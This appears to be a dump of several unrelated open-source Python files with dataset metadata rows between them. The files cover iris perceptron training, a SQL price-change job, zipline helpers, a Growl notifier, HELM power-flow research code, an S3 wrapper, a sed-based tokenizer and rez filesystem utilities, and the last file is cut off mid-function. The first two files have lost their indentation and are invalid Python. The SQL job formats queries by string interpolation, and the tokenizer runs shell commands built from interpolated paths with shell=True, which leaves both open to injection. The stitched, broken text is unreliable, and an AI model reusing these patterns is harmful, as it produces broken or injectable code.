alpha = 1 #Learning rate
for a in range(30):
r = randint(0,len(a_iris_data)-1) #randomly choose training examples
output = a_iris_data[r,0:5].dot(w)
teacher = a_iris_data[r,5]
if output >= -w[0]:
output = 1
elif output < -w[0]:
output = 0
w = w+alpha*(teacher-output)*(a_iris_data[r,0:5]) #delta rule
print(w)
#Testing accuracy
test_output = a_iris_test[:,0:5].dot(w)
for o in range(len(test_output)):
if test_output[o] >= -w[0]:
test_output[o] = 1
elif test_output[o] < -w[0]:
test_output[o] = 0
err = test_output == a_iris_test[:,5]
err = err.astype(int)
1 - np.mean(err)
# In[ ]:
| apache-2.0 | -4,896,690,168,427,554,000 | 26.638462 | 72 | 0.623991 | false |
vishakh/metamkt | metamkt/standalone/price_change_calculator.py | 1 | 2433 | import common
def calculate_price_change(conn, entity_id, mysql_interval):
result = conn.execute("""
select
(select price from PriceHistory where entity_id=%s order by timestamp desc limit 1) -
(select price from PriceHistory where entity_id=%s and timestamp < (utc_timestamp() - %s)
order by timestamp desc limit 1)""" % (entity_id, entity_id, mysql_interval))
change = result.fetchall()[0][0]
return change
def insert_price_change(conn, entity_id, interval, value):
conn.execute("""INSERT INTO PriceChange (entity_id, term, value) VALUES (%s, '%s', %s)"""
% (entity_id, interval, value))
def calculate_price_changes():
log = common.get_logger()
log.info('Calculating price changes..')
conn = common.get_connection()
trans = conn.begin()
try:
conn.execute("truncate PriceChange")
conn.execute("SELECT id FROM Entity")
users = conn.fetchall()
for user in users:
eid = user[0]
change = calculate_price_change(conn, eid, "INTERVAL 1 DAY")
if change is None:
change = 0
insert_price_change(conn, eid, "1D", change)
change = calculate_price_change(conn, eid, "INTERVAL 7 DAY")
if change is None:
change = 0
insert_price_change(conn, eid, "7D", change)
change = calculate_price_change(conn, eid, "INTERVAL 1 MONTH")
if change is None:
change = 0
insert_price_change(conn, eid, "1M", change)
change = calculate_price_change(conn, eid, "INTERVAL 3 MONTH")
if change is None:
change = 0
insert_price_change(conn, eid, "3M", change)
change = calculate_price_change(conn, eid, "INTERVAL 6 MONTH")
if change is None:
change = 0
insert_price_change(conn, eid, "6M", change)
change = calculate_price_change(conn, eid, "INTERVAL 1 YEAR")
if change is None:
change = 0
insert_price_change(conn, eid, "1Y", change)
trans.commit()
except:
trans.rollback()
raise
conn.close()
log.info('..done.')
def main():
calculate_price_changes()
if __name__ == "__main__":
main() | lgpl-3.0 | -6,761,154,637,958,323,000 | 31.026316 | 117 | 0.547061 | false |
lsbardel/zipline | zipline/gens/utils.py | 1 | 2276 | #
# Copyright 2013 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytz
import numbers
from hashlib import md5
from datetime import datetime
from zipline.protocol import DATASOURCE_TYPE
from six import iteritems, b
def hash_args(*args, **kwargs):
"""Define a unique string for any set of representable args."""
arg_string = '_'.join([str(arg) for arg in args])
kwarg_string = '_'.join([str(key) + '=' + str(value)
for key, value in iteritems(kwargs)])
combined = ':'.join([arg_string, kwarg_string])
hasher = md5()
hasher.update(b(combined))
return hasher.hexdigest()
def assert_datasource_protocol(event):
"""Assert that an event meets the protocol for datasource outputs."""
assert event.type in DATASOURCE_TYPE
# Done packets have no dt.
if not event.type == DATASOURCE_TYPE.DONE:
assert isinstance(event.dt, datetime)
assert event.dt.tzinfo == pytz.utc
def assert_trade_protocol(event):
"""Assert that an event meets the protocol for datasource TRADE outputs."""
assert_datasource_protocol(event)
assert event.type == DATASOURCE_TYPE.TRADE
assert isinstance(event.sid, int)
assert isinstance(event.price, numbers.Real)
assert isinstance(event.volume, numbers.Integral)
assert isinstance(event.dt, datetime)
def assert_datasource_unframe_protocol(event):
"""Assert that an event is valid output of zp.DATASOURCE_UNFRAME."""
assert event.type in DATASOURCE_TYPE
def assert_sort_protocol(event):
"""Assert that an event is valid input to zp.FEED_FRAME."""
assert event.type in DATASOURCE_TYPE
def assert_sort_unframe_protocol(event):
"""Same as above."""
assert event.type in DATASOURCE_TYPE
| apache-2.0 | -6,486,776,239,556,615,000 | 30.178082 | 79 | 0.710018 | false |
emesene/emesene | emesene/gui/common/GNTPNotification.py | 1 | 2006 | # -*- coding: utf-8 -*-
# This file is part of emesene.
#
# emesene is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# emesene is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with emesene; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import gntp.notifier
import sys
import gui
from gui.base import Plus
NAME = 'GNTPNotification'
DESCRIPTION = 'Wrapper around GNTP for the notification system'
AUTHOR = 'joshf'
WEBSITE = 'www.github.com/joshf'
VERSION = '1.1'
def GNTPNotification(title, text, picture_path=None, const=None,
callback=None, tooltip=None):
title = Plus.msnplus_strip(title)
if sys.platform == 'darwin':
appicon = open(gui.theme.image_theme.logo).read()
imagepath = picture_path.replace( "file:///", "/" )
icon = open(imagepath).read()
else:
appicon = gui.theme.image_theme.logo
icon = picture_path
growl = gntp.notifier.GrowlNotifier(
applicationName = "emesene",
applicationIcon = appicon,
notifications = ["Generic Notification"],
defaultNotifications = ["Generic Notification"],
# hostname = "computer.example.com", # Defaults to localhost
# password = "abc123" # Defaults to a blank password
)
growl.register()
growl.notify(
noteType = "Generic Notification",
title = title,
description = text,
icon = icon,
sticky = False,
priority = 1,
)
| gpl-3.0 | -8,234,481,197,409,525,000 | 30.84127 | 79 | 0.659023 | false |
SanPen/GridCal | src/research/power_flow/helm/old/Helm.py | 1 | 19811 | # -*- coding: utf-8 -*-
# This file is part of GridCal.
#
# GridCal is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# GridCal is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GridCal. If not, see <http://www.gnu.org/licenses/>.
import Desarrollos.power_flow_research.example_grids as grids
import numpy as np
np.set_printoptions(linewidth=320)
# np.set_printoptions(precision=6, suppress=True, linewidth=320)
from numpy import where, zeros, ones, mod, conj, array, dot, complex128
from numpy import poly1d, r_, eye, hstack, diag, linalg, Inf
from enum import Enum
from itertools import product
from scipy import fftpack
from scipy.linalg import solve
from scipy.sparse.linalg import factorized, spsolve
from scipy.sparse import issparse, csc_matrix as sparse
# just in time compiler
# from numba import jit
# Set the complex precision to use
complex_type = complex128
class NodeType(Enum):
PQ = 1,
PV = 2,
REF = 3,
NONE = 4,
STO_DISPATCH = 5 # Storage dispatch, in practice it is the same as REF
# @jit(cache=True)
def pre_process(n_bus, Yseries, Vset, pq, pv, vd):
"""
Make the Helm System matrix
@param n_bus: Number of buses of the circuit
@param Yseries: Circuit admittance matrix of the series elements
@param Vset: Vector of voltages of those nodes where the voltage is controlled (AKA Slack and PV buses)
@param S: Vector of power injections at all the nodes
@param pq: list of PQ node indices
@param pv: list of PV node indices
@param vd: list of Slack node indices
@return:
"""
"""
Reduction of the circuit magnitudes.
Args:
n_bus:
Yseries:
slack_indices: Array of indices of the slack nodes
Vset:
S:
Output:
Yred: Reduced admittance matrix (Without the rows and columns belonging to slack buses)
I: Matrix of currents (In practice only one slack bus is selected, hence it is a vector) injected by the slack buses
Sred: Array of power injections of the buses that are not of type slack
types_red: Array of types of the buses that are not of type slack
non_slack_indices: Array of indices of the buses that are not of type slack
"""
# now to have efficient arrays of coefficients
map_idx = zeros(n_bus, dtype=np.int)
map_w = zeros(n_bus, dtype=np.int)
npq = 0
npv = 0
npqpv = 0
for i in pq:
map_idx[i] = npq
map_w[i] = npqpv
npq += 1
npqpv += 1
for i in pv:
map_idx[i] = npv
map_w[i] = npqpv
npv += 1
npqpv += 1
# build the expanded system matrix
Ysys = zeros((2*n_bus, 2*n_bus))
for a, b in product(range(n_bus), range(n_bus)):
Ysys[2*a, 2*b] = Yseries[a, b].real
Ysys[2*a, 2*b+1] = -Yseries[a, b].imag
Ysys[2*a+1, 2*b] = Yseries[a, b].imag
Ysys[2*a+1, 2*b+1] = Yseries[a, b].real
# set pv column
for a in pv:
b = a
Ysys[:, 2*b] = zeros(2 * n_bus)
# Ysys[a*2, b*2+1] = 0
Ysys[a*2+1, b*2] = 1
# set vd elements
for a in vd:
Ysys[a*2, :] = zeros(2 * n_bus)
Ysys[a*2 + 1, :] = zeros(2 * n_bus)
Ysys[a*2, a*2] = 1
Ysys[a*2+1, a*2+1] = 1
# print('Ysys\n', Ysys)
# build the PV matrix
Ypv = zeros((2 * n_bus, npv))
for a, b in product(r_[pq, pv], pv):
kk = map_idx[b]
Ypv[2*a, kk] = Yseries[a, b].real
Ypv[2*a+1, kk] = Yseries[a, b].imag
# print('Ypv\n', Ypv)
Vset2 = Vset * Vset
return sparse(Ysys), Ypv, Vset2, map_idx, map_w, npq, npv
# @jit(cache=True)
def RHS(n, nbus, Ysh, Ypv, S, Vset, Vset_abs2, C, W, Q, pq, pv, vd, map_idx, map_w):
"""
Right hand side calculation.
Args:
n: Order of the coefficients
nbus: Number of buses (not counting the slack buses)
Yrow: Vector where every elements the sum of the corresponding row of the reduced admittance matrix)
I: Vector of current injections (nbus elements)
S: Vector of power injections (nbus elements)
Vset: Vector of set voltages
Vset_abs2: Vetor with the voltage set points squared. (nbus elements)
C: Voltage coefficients (Ncoeff x nbus elements)
X: Weighted coefficients (Ncoeff x nbus elements)
R: Voltage convolution coefficients (Ncoeff x nbus elements)
W: Inverse coefficients structure (Ncoeff x nbus elements)
types: Types of the non slack buses (nbus elements)
Output:
rhs: Right hand side vector to solve the coefficients (2 * nbus elements)
"""
rhs = np.empty(2 * nbus)
Vre = ones(len(pv))
for k in pq:
val = RHS_PQ(n, k, Ysh, C, S, W, map_w)
rhs[2 * k] = val.real
rhs[2 * k + 1] = val.imag
for k in vd:
val = RHS_VD(n, k, Vset)
rhs[2 * k] = val.real
rhs[2 * k + 1] = val.imag
for k in pv:
val = RHS_PV(n, k, Ysh, S, C, Q, W, map_idx, map_w)
rhs[2 * k] = val.real
rhs[2 * k + 1] = val.imag
kk = map_idx[k]
Vre[kk] = calc_Vre(n, k, C, Vset_abs2).real
rhs -= Ypv[:, kk] * Vre[kk]
return rhs, Vre
def delta(n, k):
return n == k # is 1 for n==k, 0 otherwise
# @jit(cache=True)
def RHS_VD(n, k, Vset):
"""
Right hand side calculation for a PQ bus.
Args:
n: Order of the coefficients
k: Index of the bus
Vset: set voltage of the node
Output:
Right hand side value for slack nodes
"""
if n == 0:
return complex_type(1) * delta(n, 0)
else:
return (Vset[k] - complex_type(1)) * delta(n, 1)
# @jit(cache=True)
def RHS_PQ(n, k, Ysh, C, S, W, map_w):
"""
Right hand side calculation for a PQ bus.
Args:
n: Order of the coefficients
k: Index of the bus
Ysh: Vector where every elements the sum of the corresponding row of the reduced admittance matrix)
I: Vector of current injections (nbus elements)
S: Vector of power injections (nbus elements)
W: Inverse coefficients structure (Ncoeff x nbus elements)
Output:
Right hand side value
"""
if n == 0:
return 0
else:
kw = map_w[k]
return conj(S[k]) * conj(W[n-1, kw]) - Ysh[k] * C[n - 1, k] # ASU version
def calc_W(n, k, kw, C, W):
"""
Calculation of the inverse coefficients W. (only applicable for PQ buses)
Args:
n: Order of the coefficients
k: Index of the bus
C: Voltage coefficients (Ncoeff x nbus elements)
W: Inverse coefficients structure (Ncoeff x nbus elements)
Output:
Inverse coefficient of order n for the bus k
"""
if n == 0:
res = complex_type(1)
else:
res = complex_type(0)
for l in range(n):
res -= W[l, kw] * C[n-l, k]
res /= conj(C[0, k])
return res
def RHS_PV(n, k, Ysh, S, C, Q, W, map_idx, map_w):
"""
Right hand side calculation for a PQ bus.
Args:
n: Order of the coefficients
k: Index of the bus
Ysh: Vector where every elements the sum of the corresponding row of the shunt admittance matrix
S: Vector of power injections (nbus elements)
C: Voltage coefficients (Ncoeff x nbus elements)
Q: Reactive power coefficients (Ncoeff x nbus elements)
W: Inverse coefficients structure (Ncoeff x nbus elements)
Output:
Right hand side value for the pv nodes
"""
if n == 0:
return 0 # -1j * Q[0, kk] / conj(C[0, k])
else:
kk = map_idx[k]
kw = map_w[k]
val = complex_type(0)
for l in range(1, n): # this includes the n-1
val += Q[l, kk] * W[n-l, kw].conjugate()
n1 = n-1
rhs = S[k].real * W[n1, kw].conjugate() - (1j * val) - Ysh[k] * C[n1, k]
return rhs
def calc_Vre(n, k, C, Vset_abs2):
"""
Compute the real part of the voltage for PV ndes
Args:
n: order
k: PV node index
C: Structure of voltage coefficients
Vset_abs2: Square of the set voltage module
Returns:
Real part of the voltage for the PV nodes
"""
# vre = delta(n, 0) + 0.5 * delta(n, 1) * (Vset_abs2[k] - 1) - 0.5 * R
if n == 0:
return complex_type(1)
elif n == 1:
R = calc_R(n, k, C)
return 0.5 * (Vset_abs2[k] - 1) - 0.5 * R
else:
return complex_type(0)
return vre
def calc_R(n, k, C):
"""
Convolution coefficient
Args:
n: Order of the coefficients
k: Index of the bus
C: Voltage coefficients (Ncoeff x nbus elements)
Output:
Convolution coefficient of order n for the bus k
"""
result = complex_type(0)
for l in range(n+1):
result += C[l, k] * C[n-l, k].conjugate()
return result
def epsilon(Sn, n, E):
"""
Fast recursive Wynn's epsilon algorithm from:
NONLINEAR SEQUENCE TRANSFORMATIONS FOR THE ACCELERATION OF CONVERGENCE
AND THE SUMMATION OF DIVERGENT SERIES
by Ernst Joachim Weniger
"""
Zero = complex_type(0)
One = complex_type(1)
Tiny = np.finfo(complex_type).min
Huge = np.finfo(complex_type).max
E[n] = Sn
if n == 0:
estim = Sn
else:
AUX2 = Zero
for j in range(n, 0, -1): # range from n to 1 (both included)
AUX1 = AUX2
AUX2 = E[j-1]
DIFF = E[j] - AUX2
if abs(DIFF) <= Tiny:
E[j-1] = Huge
else:
if DIFF == 0:
DIFF = Tiny
E[j-1] = AUX1 + One / DIFF
if mod(n, 2) == 0:
estim = E[0]
else:
estim = E[1]
return estim, E
def pade_approximation(n, an, s=1):
"""
Computes the n/2 pade approximant of the series an at the approximation
point s
Arguments:
an: coefficient series
n: order of the series
s: point of approximation
Returns:
pade approximation at s
"""
nn = int(n/2)
if mod(nn, 2) == 0:
nn -= 1
L = nn
M = nn
an = np.ndarray.flatten(an)
rhs = an[L+1:L+M+1]
C = zeros((L, M), dtype=complex_type)
for i in range(L):
k = i + 1
C[i, :] = an[L-M+k:L+k]
try:
b = solve(C, -rhs) # bn to b1
except:
print()
return 0, zeros(L+1, dtype=complex_type), zeros(L+1, dtype=complex_type)
b = r_[1, b[::-1]] # b0 = 1
a = zeros(L+1, dtype=complex_type)
a[0] = an[0]
for i in range(L):
val = complex_type(0)
k = i + 1
for j in range(k+1):
val += an[k-j] * b[j]
a[i+1] = val
p = complex_type(0)
q = complex_type(0)
for i in range(L+1):
p += a[i] * s**i
q += b[i] * s**i
return p/q, a, b
def interprete_solution(nbus, npv, pv, pqvd, x_sol, Vre, map_idx):
"""
Assign the solution vector individual values to the correct places
Args:
nbus: number of system nodes
npv: number of pv nodes
types: types of each node
x_sol: solution vector to analyze
Vre: Vector or real part of the voltage for the PV nodes
map_idx: mapping array from normal bus index to PV index
Returns:
Voltages coefficients and reactive power coefficients for the PV nodes at the order of x_sol
"""
C = zeros(nbus, dtype=complex_type)
Q = zeros(npv)
# for k in pqvd: # non vectorized code
# C[k] = x_sol[2 * k] + 1j * x_sol[2 * k + 1]
# set the PQ and Slack nodes
C[pqvd] = x_sol[2 * pqvd] + 1j * x_sol[2 * pqvd + 1]
# for k in pv: # non vectorized code
# kk = map_idx[k]
# Q[kk] = x_sol[2 * k]
# C[k] = Vre[kk] + 1j * x_sol[2 * k + 1]
# Set the PV nodes
kk = map_idx[pv]
Q[kk] = x_sol[2 * pv]
C[pv] = Vre[kk] + 1j * x_sol[2 * pv + 1]
return C, Q
def helm(Y, Ys, Ysh, max_coefficient_count, S, voltage_set_points, pq, pv, vd, eps=1e-3, use_pade=True):
"""
Run the holomorphic embedding power flow
@param Y: Circuit complete admittance matrix
@param Ys: Circuit series elements admittance matrix
@param Ysh: Circuit shunt elements admittance matrix
@param max_coefficient_count: Maximum number of voltage coefficients to evaluate (Must be an odd number)
@param S: Array of power injections matching the admittance matrix size
@param voltage_set_points: Array of voltage set points matching the admittance matrix size
@param pq: list of PQ node indices
@param pv: list of PV node indices
@param vd: list of Slack node indices
@param eps: Tolerance
@param use_pade: Use the Padè approximation? If False the Epsilon algorithm is used
@return:
"""
nbus = np.shape(Ys)[0]
# The routines in this script are meant to handle sparse matrices, hence non-sparse ones are not allowed
assert(issparse(Ys))
# assert(not np.all((Ys + sparse(np.eye(nbus) * Ysh) != Y).data))
# Make bus type lists combinations that are going to be used later
pqvd = r_[pq, vd]
pqvd.sort()
pqpv = r_[pq, pv]
pqpv.sort()
print('Ymat:\n', Y.todense())
print('Yseries:\n', Ys.todense())
print('Yshunt:\n', Ysh)
# prepare the arrays
Ysys, Ypv, Vset, map_idx, map_w, npq, npv = pre_process(n_bus=nbus, Yseries=Ys, Vset=voltage_set_points,
pq=pq, pv=pv, vd=vd)
print('Ysys:\n', Ysys.todense())
# F = np.zeros(nbus, dtype=complex_type)
# F[Ysh.indices] = Ysh.data
# declare the matrix of coefficients that will lead to the voltage computation
C = zeros((0, nbus), dtype=complex_type)
# auxiliary array for the epsilon algorithm
E_v = zeros((0, nbus), dtype=complex_type)
E_q = zeros((0, npv), dtype=complex_type)
# Declare the inverse coefficients vector
# (it is actually a matrix; a vector of coefficients per coefficient order)
W = zeros((0, npq+npv), dtype=complex_type)
# Reactive power on the PV nodes
Q = zeros((0, npv), dtype=complex_type)
# Squared values of the voltage module for the buses that are not of slack type
Vset_abs2 = abs(voltage_set_points) ** 2
# progressive calculation of coefficients
n = 0
converged = False
inside_precision = True
errors = list()
errors_PV_P = list()
errors_PV_Q = list()
errors_PQ_P= list()
errors_PQ_Q = list()
voltages = list()
Sn_v = zeros(nbus, dtype=complex_type)
Sn_q = zeros(npv, dtype=complex_type)
voltages_vector = zeros(nbus, dtype=complex_type)
Vred_last = zeros(nbus, dtype=complex_type)
solve = factorized(Ysys)
# set the slack indices voltages
voltages_vector[vd] = voltage_set_points[vd]
while n <= max_coefficient_count and not converged and inside_precision:
# Reserve coefficients memory space
C = np.vstack((C, np.zeros((1, nbus), dtype=complex_type)))
E_v = np.vstack((E_v, np.zeros((1, nbus), dtype=complex_type)))
E_q = np.vstack((E_q, np.zeros((1, npv))))
W = np.vstack((W, np.zeros((1, npq+npv), dtype=complex_type)))
Q = np.vstack((Q, np.zeros((1, npv), dtype=complex_type)))
# get the system independent term to solve the coefficients
# n, nbus, F, Ypv, S, Vset, Vset_abs2, C, W, Q, pq, pv, vd, map_idx, map_w,
rhs, Vre = RHS(n, nbus, Ysh, Ypv, S, Vset, Vset_abs2, C, W, Q, pq, pv, vd, map_idx, map_w)
# Solve the linear system to obtain the new coefficients
x_sol = solve(rhs)
# assign the voltages and the reactive power values correctly
C[n, :], Q[n, :] = interprete_solution(nbus, npv, pv, pqvd, x_sol, Vre, map_idx)
# copy variables for the epsilon algorithm
if not use_pade:
E_v[n, :] = C[n, :]
E_q[n, :] = Q[n, :]
Sn_v += C[n, :]
Sn_q += Q[n, :]
# Update the inverse voltage coefficients W for the non slack nodes
for k in pqpv:
kw = map_w[k] # actual index in the coefficients structure
W[n, kw] = calc_W(n, k, kw, C, W)
# calculate the reactive power
for k in pv:
kk = map_idx[k]
if use_pade:
if mod(n, 2) == 0 and n > 2:
q, _, _ = pade_approximation(n, Q)
S[k] = S[k].real + 1j * q.real
else:
q, E_q[:, kk] = epsilon(Sn_q[kk], n, E_q[:, kk])
S[k] = S[k].real + 1j * q
# calculate the voltages
for k in pqpv:
if use_pade:
if mod(n, 2) == 0 and n > 2:
v, _, _ = pade_approximation(n, C[:, k])
voltages_vector[k] = v
else:
voltages_vector[k], E_v[:, k] = epsilon(Sn_v[k], n, E_v[:, k])
if np.isnan(voltages_vector[k]):
print('Maximum precision reached at ', n)
voltages_vector = Vred_last
inside_precision = False
break
Vred_last = voltages_vector.copy()
# Compose the voltage values from the coefficient series
voltages.append(voltages_vector.copy())
# print(voltages_vector)
# Calculate the error and check the convergence
Scalc = voltages_vector * conj(Y * voltages_vector)
power_mismatch = Scalc - S # complex power mismatch
power_mismatch_ = r_[power_mismatch[pv].real, power_mismatch[pq].real, power_mismatch[pq].imag] # concatenate error by type
# check for convergence
normF = linalg.norm(power_mismatch_, Inf)
errors.append(normF)
errors_PV_P.append(power_mismatch[pv].real)
errors_PV_Q.append(power_mismatch[pv].imag)
errors_PQ_P.append(power_mismatch[pq].real)
errors_PQ_Q.append(power_mismatch[pq].imag)
if normF < eps:
converged = True
else:
converged = False
n += 1 # increase the coefficients order
# errors_lst = [array(errors), array(errors_PV_P), array(errors_PV_Q), array(errors_PQ_P), array(errors_PQ_Q)]
return Vred_last, converged, normF, Scalc
def bifurcation_point(C, slackIndices):
"""
Computes the bifurcation point
@param C:
@return:
"""
npoints = 100
order_num, bus_num = np.shape(C)
# V(S) = P(S)/Q(S)
V = zeros((npoints, bus_num), dtype=complex_type)
L = zeros((npoints, bus_num))
for k in range(bus_num):
if k not in slackIndices:
_, p, q = pade_approximation(order_num, C[:, k])
# print(k, 'P:', p)
# print(k, 'Q:', q)
asint = np.roots(q[::-1])
asint = np.sort(abs(asint))
asint = asint[asint > 2]
print('Asymptotes', asint)
# print('Asymptote:', asint[0])
bpoint = asint[0]
# bpoint = max(asint)
lmda = np.linspace(1, bpoint, npoints+1)[:-1]
# lmda = np.linspace(1, 100, npoints)
pval = np.polyval(p[::-1], lmda)
qval = np.polyval(q[::-1], lmda)
V[:, k] = pval / qval
L[:, k] = lmda
return V, L
| gpl-3.0 | -1,298,887,950,109,372,700 | 27.421808 | 132 | 0.570116 | false |
RetailMeNot/acky | acky/s3.py | 1 | 4051 | from acky.api import AwsApiClient
try:
from urllib import parse
except ImportError:
import urlparse as parse
class InvalidURL(Exception):
def __init__(self, url, msg=None):
self.url = url
if not msg:
msg = "Invalid URL: {0}".format(url)
super(InvalidURL, self).__init__(msg)
def _parse_url(url=None):
"""Split the path up into useful parts: bucket, obj_key"""
if url is None:
return ('', '')
scheme, netloc, path, _, _ = parse.urlsplit(url)
if scheme != 's3':
raise InvalidURL(url, "URL scheme must be s3://")
if path and not netloc:
raise InvalidURL(url)
return netloc, path[1:]
class S3(AwsApiClient):
"""Interface for managing S3 buckets. (API Version 2006-03-01)"""
service_name = "s3"
def get(self, url=None, delimiter="/"):
"""Path is an s3 url. Ommiting the path or providing "s3://" as the
path will return a list of all buckets. Otherwise, all subdirectories
and their contents will be shown.
"""
params = {'Delimiter': delimiter}
bucket, obj_key = _parse_url(url)
if bucket:
params['Bucket'] = bucket
else:
return self.call("ListBuckets", response_data_key="Buckets")
if obj_key:
params['Prefix'] = obj_key
objects = self.call("ListObjects", response_data_key="Contents",
**params)
if objects:
for obj in objects:
obj['url'] = "s3://{0}/{1}".format(bucket, obj['Key'])
return objects
def create(self, url):
"""Create a bucket, directory, or empty file."""
bucket, obj_key = _parse_url(url)
if not bucket:
raise InvalidURL(url,
"You must specify a bucket and (optional) path")
if obj_key:
target = "/".join((bucket, obj_key))
else:
target = bucket
return self.call("CreateBucket", bucket=target)
def destroy(self, url, recursive=False):
"""Destroy a bucket, directory, or file. Specifying recursive=True
recursively deletes all subdirectories and files."""
bucket, obj_key = _parse_url(url)
if not bucket:
raise InvalidURL(url,
"You must specify a bucket and (optional) path")
if obj_key:
target = "/".join((bucket, obj_key))
else:
target = bucket
if recursive:
for obj in self.get(url, delimiter=''):
self.destroy(obj['url'])
return self.call("DeleteBucket", bucket=target)
def upload(self, local_path, remote_url):
"""Copy a local file to an S3 location."""
bucket, key = _parse_url(remote_url)
with open(local_path, 'rb') as fp:
return self.call("PutObject", bucket=bucket, key=key, body=fp)
def download(self, remote_url, local_path, buffer_size=8 * 1024):
"""Copy S3 data to a local file."""
bucket, key = _parse_url(remote_url)
response_file = self.call("GetObject", bucket=bucket, key=key)['Body']
with open(local_path, 'wb') as fp:
buf = response_file.read(buffer_size)
while buf:
fp.write(buf)
buf = response_file.read(buffer_size)
def copy(self, src_url, dst_url):
"""Copy an S3 object to another S3 location."""
src_bucket, src_key = _parse_url(src_url)
dst_bucket, dst_key = _parse_url(dst_url)
if not dst_bucket:
dst_bucket = src_bucket
params = {
'copy_source': '/'.join((src_bucket, src_key)),
'bucket': dst_bucket,
'key': dst_key,
}
return self.call("CopyObject", **params)
def move(self, src_url, dst_url):
"""Copy a single S3 object to another S3 location, then delete the
original object."""
self.copy(src_url, dst_url)
self.destroy(src_url)
| mit | -417,330,416,866,376,600 | 29.923664 | 78 | 0.555172 | false |
idjaw/dot-manager | app/core/tokenizer.py | 1 | 2196 | from functools import wraps
from re import search
from subprocess import call
from logging import getLogger
from core.exceptions import TokenizationError
log = getLogger("Tokenizer")
def exception_decorator(func):
@wraps(func)
def func_wrapper(*args, **kw):
try:
return func(*args, **kw)
except Exception as e:
log.error("Tokenization failed: {}".format(e))
raise TokenizationError(message=e)
return func_wrapper
class Tokenizer(object):
@exception_decorator
def tokenize(self, file_path, token_list):
log.debug("Tokenizing: {}".format(file_path))
for token in token_list:
call(
'''
sed \
's/{0}\([[:space:]]*=[[:space:]]*\"*\).*[^\"*]/{0}\\1__{0}__/' \
{1} >{1}_new ; mv {1}_new {1}
'''.format(token, file_path),
shell=True
)
log.debug("Tokenized")
@exception_decorator
def replace_tokens_with_actual(self, src_path, tokenized_path, token_list):
token_to_actual_map = self.token_to_actual_data_mapping(
src_path,
token_list
)
for token in token_list:
call(
'''
sed 's/{0}\([[:space:]]*=[[:space:]]*\"*\).*[^\"*]/{0}\\1{2}/' \
{3} >{3}_new ; mv {3}_new {3}
'''.format(
token.strip('_'),
token,
token_to_actual_map.get(token),
tokenized_path
),
shell=True
)
log.debug("Tokenized")
@exception_decorator
def token_to_actual_data_mapping(self, path, token_list):
token_mapper = {}
with open(path) as f:
file_data = f.readlines()
for i in token_list:
stripped = i.strip('_')
for fi in file_data:
matcher = search(
r'({0})\s*=\s*"*(.*[^"*])'.format(stripped), fi
)
if matcher:
token_mapper[i] = matcher.group(2).rstrip()
return token_mapper
| mit | -1,021,853,459,590,033,300 | 29.5 | 80 | 0.473133 | false |
nerdvegas/rez | src/rez/utils/filesystem.py | 1 | 20893 | """
Filesystem-related utilities.
"""
from __future__ import print_function
from threading import Lock
from tempfile import mkdtemp
from contextlib import contextmanager
from uuid import uuid4
import errno
import weakref
import atexit
import posixpath
import ntpath
import os.path
import shutil
import os
import re
import stat
import platform
from rez.vendor.six import six
from rez.utils.platform_ import platform_
is_windows = platform.system() == "Windows"
class TempDirs(object):
"""Tempdir manager.
Makes tmpdirs and ensures they're cleaned up on program exit.
"""
instances_lock = Lock()
instances = []
def __init__(self, tmpdir, prefix="rez_"):
self.tmpdir = tmpdir
self.prefix = prefix
self.dirs = set()
self.lock = Lock()
with TempDirs.instances_lock:
TempDirs.instances.append(weakref.ref(self))
def mkdtemp(self, cleanup=True):
path = mkdtemp(dir=self.tmpdir, prefix=self.prefix)
if not cleanup:
return path
with self.lock:
self.dirs.add(path)
return path
def __del__(self):
self.clear()
def clear(self):
with self.lock:
if not self.dirs:
return
dirs = self.dirs
self.dirs = set()
for path in dirs:
if os.path.exists(path) and not os.getenv("REZ_KEEP_TMPDIRS"):
shutil.rmtree(path)
@classmethod
def clear_all(cls):
with TempDirs.instances_lock:
instances = cls.instances[:]
for ref in instances:
instance = ref()
if instance is not None:
instance.clear()
atexit.register(TempDirs.clear_all)
@contextmanager
def make_path_writable(path):
"""Temporarily make `path` writable, if possible.
Args:
path (str): Path to make temporarily writable
"""
try:
orig_mode = os.stat(path).st_mode
new_mode = orig_mode
if not os.access(path, os.W_OK):
new_mode = orig_mode | stat.S_IWUSR
# make writable
if new_mode != orig_mode:
os.chmod(path, new_mode)
except OSError:
# ignore access errors here, and just do nothing. It will be more
# intuitive for the calling code to fail on access instead.
#
orig_mode = None
new_mode = None
# yield, then reset mode back to original
try:
yield
finally:
if new_mode != orig_mode:
os.chmod(path, orig_mode)
@contextmanager
def retain_cwd():
"""Context manager that keeps cwd unchanged afterwards.
"""
cwd = os.getcwd()
try:
yield
finally:
os.chdir(cwd)
def get_existing_path(path, topmost_path=None):
"""Get the longest parent path in `path` that exists.
If `path` exists, it is returned.
Args:
path (str): Path to test
topmost_path (str): Do not test this path or above
Returns:
str: Existing path, or None if no path was found.
"""
prev_path = None
if topmost_path:
topmost_path = os.path.normpath(topmost_path)
while True:
if os.path.exists(path):
return path
path = os.path.dirname(path)
if path == prev_path:
return None
if topmost_path and os.path.normpath(path) == topmost_path:
return None
prev_path = path
def safe_listdir(path):
"""Safe listdir.
Works in a multithread/proc scenario where dirs may be deleted at any time
"""
try:
return os.listdir(path)
except OSError as e:
if e.errno in (errno.ENOENT, errno.ENOTDIR):
return []
raise
def safe_makedirs(path):
"""Safe makedirs.
Works in a multithreaded scenario.
"""
if not os.path.exists(path):
try:
os.makedirs(path)
